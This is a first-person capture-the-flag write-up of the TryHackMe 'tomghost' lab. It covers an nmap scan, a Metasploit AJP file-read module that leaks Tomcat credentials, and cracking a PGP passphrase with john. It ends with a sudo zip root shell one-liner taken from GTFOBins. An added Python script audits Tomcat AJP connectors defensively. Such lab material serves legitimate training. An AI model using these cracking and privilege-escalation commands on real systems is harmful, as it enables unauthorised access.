https://tryhackme.com/room/tomghost

💭 Thoughts after doing the room

I had to look up gpg commands, because I rarely use them, but all in all this room was pretty straightforward, from nmap to metasploit to sudo privileges.

nmap

First I do a rough scan with nmap:

┌──(toor㉿kali1)-[~/tryhackme]
└─$ nmap -A -T4 10.10.79.57
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-02 22:27 CET
Nmap scan report for 10.10.79.57
Host is up (0.032s latency).
Not shown: 996 closed tcp ports (conn-refused)
PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 f3:c8:9f:0b:6a:c5:fe:95:54:0b:e9:e3:ba:93:db:7c (RSA)
|   256 dd:1a:09:f5:99:63:a3:43:0d:2d:90:d8:e3:e1:1f:b9 (ECDSA)
|_  256 48:d1:30:1b:38:6c:c6:53:ea:30:81:80:5d:0c:f1:05 (ED25519)
53/tcp   open  tcpwrapped
8009/tcp open  ajp13      Apache Jserv (Protocol v1.3)
| ajp-methods: 
|_  Supported methods: GET HEAD POST OPTIONS
8080/tcp open  http       Apache Tomcat 9.0.30
|_http-favicon: Apache Tomcat
|_http-title: Apache Tomcat/9.0.30
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.33 seconds

There I see that Tomcat is installed, the web interface is on port 8080, and Apache JServ (AJP) is on port 8009.

nmap also shows the Tomcat version, which I'll confirm in the web interface.

I search the web for tomcat 9.0.30 CVE and

https://www.cvedetails.com/version/644763/Apache-Tomcat-9.0.30.html

is one of the first hits. Two code execution CVEs from 2020, one with a score of 9.8.

metasploit

In metasploit I search with search ajp.

The first one looks like the right one.

With show options I check the required options.

Everything seems right. I don't know what /WEB-INF/web.xml is, so I ask ChatGPT.

With set rhosts 10.10.79.57 I provide the IP and with exploit I start the process:

In the output I see a username and password.
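The AJP connector on 8009 is what the metasploit module talked to, and the Tomcat release after 9.0.30 changed the AJP defaults to bind to loopback and require a shared secret. As an added, defender-side example that is not part of the original writeup, the script below parses a Tomcat server.xml and flags AJP connectors that are still reachable from the network or accept requests without a secret; the two XML samples are constructed, not the room's configuration.

```python
"""Audit a Tomcat server.xml for AJP connectors reachable without a shared secret.

Added example, not code from the original writeup. The rule is conservative: a
missing address or missing secret is flagged, so the result does not depend on
which version's defaults apply (9.0.30 listened on all interfaces with no secret;
later releases default to loopback and secretRequired="true").
"""
import xml.etree.ElementTree as ET

LOOPBACK = {"127.0.0.1", "::1", "0:0:0:0:0:0:0:1", "localhost"}


def audit_ajp(server_xml: str) -> list[str]:
    """Return one finding per problem on each AJP connector; [] means clean."""
    findings = []
    for conn in ET.fromstring(server_xml).iter("Connector"):
        # protocol is "AJP/1.3" or a class name like org.apache.coyote.ajp.AjpNioProtocol;
        # connectors without a protocol attribute default to HTTP/1.1 and are skipped.
        if "ajp" not in conn.get("protocol", "HTTP/1.1").lower():
            continue
        port = conn.get("port", "?")
        address = conn.get("address")
        if address is None or address.strip("[]") not in LOOPBACK:
            findings.append(f"AJP connector on port {port} binds to "
                            f"{address or 'all interfaces'}; bind it to loopback or firewall it")
        has_secret = conn.get("secretRequired", "").lower() == "true" and bool(conn.get("secret"))
        if not has_secret:
            findings.append(f"AJP connector on port {port} accepts requests without a shared "
                            'secret; set secretRequired="true" and a secret known to the proxy')
    return findings


# Constructed samples: EXPOSED_XML mirrors the posture nmap showed on the room's host
# (AJP/1.3 on 8009 answering from the network); HARDENED_XML is the corrected form.
EXPOSED_XML = """<Server port="8005" shutdown="SHUTDOWN"><Service name="Catalina">
  <Connector port="8080" protocol="HTTP/1.1" connectionTimeout="20000" redirectPort="8443"/>
  <Connector port="8009" protocol="AJP/1.3" redirectPort="8443"/>
</Service></Server>"""

HARDENED_XML = """<Server port="8005" shutdown="SHUTDOWN"><Service name="Catalina">
  <Connector port="8080" protocol="HTTP/1.1" connectionTimeout="20000" redirectPort="8443"/>
  <Connector port="8009" protocol="AJP/1.3" address="127.0.0.1"
             secretRequired="true" secret="PLACEHOLDER-SHARED-SECRET" redirectPort="8443"/>
</Service></Server>"""

if __name__ == "__main__":
    for label, xml_text in (("exposed", EXPOSED_XML), ("hardened", HARDENED_XML)):
        print(label, audit_ajp(xml_text) or ["no findings"])
```

Run it against a real CATALINA_HOME/conf/server.xml by passing the file contents to audit_ajp; a commented-out AJP connector produces no findings because it is not parsed.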

trying to log in

I look up the Tomcat manager URL (host/manager/html), but I can't access it that way.

Earlier with nmap I saw that the ssh service is also running, so I try the user/pass combo there.

Login successful. I check whether I have sudo rights:

skyfuck@ubuntu:~$ sudo -l
[sudo] password for skyfuck:
Sorry, user skyfuck may not run sudo on ubuntu.

Nope, but there are two files in the home directory:

skyfuck@ubuntu:~$ ls
credential.pgp  tryhackme.asc

I copy those files over to my host with scp.

The ASC file is the ASCII-armored private key, and its passphrase needs to be recovered. For this I use

gpg2john tryhackme.asc > tomhash

and then crack the resulting hash with

john --wordlist=/usr/share/wordlists/rockyou.txt tomhash

Import the key:

┌──(toor㉿kali1)-[~/tryhackme/tomghost]
└─$ gpg --import tryhackme.asc             
gpg: key 8F3DA3DEC6707170: public key "tryhackme <stuxnet@tryhackme.com>" imported
gpg: key 8F3DA3DEC6707170: secret key imported
gpg: key 8F3DA3DEC6707170: "tryhackme <stuxnet@tryhackme.com>" not changed
gpg: Total number processed: 2
gpg:               imported: 1
gpg:              unchanged: 1
gpg:       secret keys read: 1
gpg:   secret keys imported: 1

Then I decrypt credential.pgp, which requires the cracked passphrase:

┌──(toor㉿kali1)-[~/tryhackme/tomghost]
└─$ gpg --decrypt credential.pgp           
gpg: WARNING: cipher algorithm CAST5 not found in recipient preferences
gpg: encrypted with 1024-bit ELG key, ID 61E104A66184FBCC, created 2020-03-11
      "tryhackme <stuxnet@tryhackme.com>"
XXXXXX

With this information I can log in as another user, either with su or with another ssh session. Then I check the sudo rights, which allow executing /usr/bin/zip as root.

┌──(toor㉿kali1)-[~/tryhackme/tomghost]
└─$ ssh merlin@10.10.79.57
merlin@10.10.79.57's password:
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.4.0-174-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

Last login: Tue Mar 10 22:56:49 2020 from 192.168.85.1
merlin@ubuntu:~$ sudo -l
Matching Defaults entries for merlin on ubuntu:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User merlin may run the following commands on ubuntu:
    (root : root) NOPASSWD: /usr/bin/zip

Then I check the user directory, which contains the first flag.

Now I try to get root via the handy GTFOBins:

https://gtfobins.github.io/gtfobins/zip/

It wasn't clear to me what the line sudo zip $TF /etc/hosts -T -TT 'sh #' does, so I ask ChatGPT 3.5; the answer wasn't good enough, so I ask ChatGPT 4.0.

I execute the commands, which leads to the root flag.